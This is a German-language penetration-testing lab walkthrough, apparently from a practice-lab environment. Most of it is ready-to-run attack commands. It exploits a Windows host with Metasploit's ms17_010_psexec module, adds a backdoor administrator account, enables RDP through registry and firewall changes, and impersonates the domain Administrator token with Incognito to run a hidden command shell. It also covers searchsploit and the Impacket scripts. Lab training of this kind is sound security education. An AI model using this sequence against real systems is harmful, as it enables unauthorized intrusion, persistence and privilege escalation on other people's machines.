Create a Backdoor User
Meterpreter zum Ziel starten
You will now use the PsExec exploit
use exploit/windows/smb/ms17_010_psexec set RHOST 192.168.0.5 set SMBUser admin set SMBPass Passw0rd run
User mit Berechtigung anlegen
Meterpreter ist gestartet, wir können beginnen
meterpreter > shell # auf windows eine Shell öffnen (cmd) c:\windows\system32> net user plab Passw0rd /add #auf Windows den User plab mit PW Passw0rd anlegen net localgroup administrators plab /add # User plab zum Admin machen net localgroup "Remote Desktop Users" plab /add # plab zur Gruppe Remote Desktop Users hinzufügen
RDP in der Firewall etablieren
netsh firewall set service RemoteDesktop enable
Achtung: der Befehl firewall wird ersetzt
IMPORTANT: Command executed successfully. However, "netsh firewall" is deprecated; use "netsh advfirewall firewall" instead. For more information on using "netsh advfirewall firewall" commands instead of "netsh firewall", see KB article 947709 at http://go.microsoft.com/fwlink/?linkid=121488 .
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v DenyTSConnections /t REG_DWORD /d 0 /f reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Jetzt können wir den Remote Desktop service auf autostart setzten und starten
sc config TermService start= auto net start Termservice
Es wird Zeit eine netshell zu starten und in die Firewall-Shell zu gehen
netsh.exe netsh> firewall
Wir öffnen Port 3389 TCP für RDP
add portopening TCP 3389 "Remote Desktop"
Soweit fertig. Die Firewall-Shell kann mit exit wieder geschlossen werden. Auch die CMD mit exit schließen. Wir sind wieder im Meterpreter
Enable Remote Desktop using Meterpreter
wir brauchen wieder eine offene Meterpreter-Session zum Zielsystem (siehe oben). Datim können wir RDP starten
run post/windows/manage/enable_rdp
Use the Incognito Module
Token in Windows ähneln den Cookies in Webanwendungen. Es gibt zwei Arten von Token:
- Delegate: Werden erstellt, wenn Sie sich bei einem System anmelden. Diese werden auch erstellt, wenn Sie sich über Remote Desktop mit einem System verbinden.
- Impersonate: Werden für eine nicht interaktive Sitzung erstellt, z. B. zum Herstellen einer Verbindung mit einem Netzlaufwerk.
Inkognito werden und die vorhandenen Token ansehen
use incognito list_tokens -u
Um die Privilegien von PRACTICELABS\Administrator zu erlangen, müssen wir das Token imitieren.
impersonate_token PRACTICELABS\\Administrator # achte auf die doppelten \\
die User-ID ausgeben und Berechtigung prüfen
getuid
jetzt können wir als Admin versteckt arbeiten, eine cmd starten und testen wer wir sind
execute -f cmd.exe -i -t # startet eine versteckte cmd whoami
mit exe beenden wir die Session und fallen zurück zu Meterpreter. Das Aufräumen nicht vergessen. mit
rev2self
stellen wir den alten Token wieder her. (prüfe mit getuid)
Searchsploit
searchsploit wurde entwickelt, um die lokale Exploit-Datenbank zu durchsuchen. Dieses Tool ist praktisch, wenn Sie keine Internetverbindung haben und nach Exploits suchen müssen. Wenn jedoch die Exploit-Datenbank nicht aktualisiert wird, erhalten Sie möglicherweise nicht die Exploit-Informationen, nach denen Sie gesucht haben. Sie können eine Suche anhand des Titels durchführen und sogar einen Exploit untersuchen.
Dafür starten wir in Kali eine neue Shell und updaten die DB von Searchsploit
searchsploit -u
Mit einer frischen Datenbank können wir nach beliebigen Exploits suchen
searchsploit MS17-010 # sucht nach explizitem Exploit searchsploit -t windows remote # sucht alle Windows remote Exploits searchsploit -m 39166 # kopiert 39166 in den Ordner /root/ searchsploit 39166 --examine # untersucht ein Exploit searchsploit Windows iis -w # zeigt Update-Informationen an searchsploit --exclude=Windows # schließt alle Treffer mit "Windows" aus searchsploit windows | grep “Privilege Escalation” # greppen kann man auch searchsploit -c XSS # case-sensitive Suche
Impacket
Impacket ist eine Reihe von Python-Skripten, mit denen Sie eine ganze Reihe von Informationen aus einem System abrufen können. Es enthält mehrere vorgefertigte Skripte, die wie folgt kategorisiert sind:
| Remotecodeausführung | atexec.py, dcomexec.py, psexec.py, smbexec.py, wmiexec.py |
| SMB/MSRPC | getArch.py, ifmap.py, lookupsid.py, samrdump.py, services.py, netview.py, smbclient.py, opdump.py, rpcdump.py, reg.py |
| Kerberos | GetST.py, GetPac.py, GetUserSPNs.py, GetNPUsers.py, ticketer.py, raiseChild.py |
| Windows-Secret | mimikatz.py |
| Server-Tools/MiTM-Angriffe | karmaSMB.py, smbserver.py |
| Windows-Verwaltungsinstrumentation (WMI) | wmipersist.py |
| SAMBA | sambaPipe.py, sambaPipe.py |
| MSSQL | mssqlclient.py |
| Dateiformate | ntfs-read.py, Registry-read.py |
| Verschiedenes | mqtt_check.py, rdp_check.py, sniffer.py, ping.py, ping6.py |
Dazu wird zuerst python installiert
python setup.py install
Dann zum Ordner examples springen. Darin sind alle *.py-Dateien enthalten. Eine Beschreibung der Apps findet man im Netz :)